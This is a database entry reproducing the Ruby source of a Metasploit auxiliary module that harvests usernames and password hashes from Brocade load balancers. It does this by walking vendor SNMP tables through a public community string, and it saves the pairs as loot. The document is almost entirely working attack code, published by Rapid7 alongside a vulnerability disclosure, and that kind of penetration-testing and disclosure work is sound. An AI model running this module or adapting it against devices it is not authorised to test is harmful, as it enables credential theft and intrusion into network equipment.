Brocade Password Hash Enumeration

2014-05-16T13:32:46
ID MSF:AUXILIARY/SCANNER/SNMP/BROCADE_ENUMHASH
Type metasploit
Reporter Rapid7
Modified 2020-02-18T15:06:11

Description

This module extracts password hashes from certain Brocade load balancer devices.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Brocade Password Hash Enumeration',
      'Description' => %q{
        This module extracts password hashes from certain Brocade load
        balancer devices.
      },
      'References'  =>
        [
          [ 'URL', 'https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
        ],
      'Author'      => ['Deral "PercentX" Heiland'],
      'License'     => MSF_LICENSE
    )

  end

  def run_host(ip)
    begin
      snmp = connect_snmp

      if snmp.get_value('sysDescr.0') =~ /Brocade/

        @users = []
        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
          row.each { |val| @users << val.value.to_s }
        end

        @hashes = []
        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
          row.each { |val| @hashes << val.value.to_s }
        end

        print_good("#{ip} - Found user and password hashes:")
        end

        credinfo = ""
        @users.each_index do |i|
        credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
        print_good("#{@users[i]}:#{@hashes[i]}")
        end


     #Woot we got loot.
     loot_name     = "brocade.hashes"
     loot_type     = "text/plain"
     loot_filename = "brocade_hashes.txt"
     loot_desc     = "Brodace username and password hashes"
     p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)

     print_status("Credentials saved: #{p}")
     rescue ::SNMP::UnsupportedVersion
     rescue ::SNMP::RequestTimeout
     rescue ::Interrupt
       raise $!
     rescue ::Exception => e
       print_error("#{ip} - Error: #{e.class} #{e}")
     disconnect_snmp
     end
  end
end